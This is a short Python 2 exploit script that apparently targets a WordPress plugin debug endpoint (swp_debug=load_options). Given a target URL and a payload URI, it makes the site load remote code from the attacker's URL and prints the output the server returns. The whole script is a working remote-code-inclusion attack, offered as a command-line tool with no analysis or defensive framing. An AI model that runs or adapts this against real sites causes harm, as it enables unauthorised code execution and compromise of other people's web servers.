class EXPLOIT:
VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
def __init__(self, _t, _p):
self.target = _t
self.payload = _p
def engage(self):
uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
r = requests.get( uri )
if r.status_code == 500:
print "[*] Received Response From Server!"
rr = r.text
obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
if obj:
resp = obj.groups()[0]
if resp:
print "[<] Received: "
print resp.replace( "lnbreak", "\n" )
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit( "[~] Unexpected Status Received!" )
def main():
parser = optparse.OptionParser( )
parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )
(options, args) = parser.parse_args()
print "[>] Sending Payload to System!"
exploit = EXPLOIT( options.target, options.payload )
exploit.engage()
if __name__ == "__main__":
main()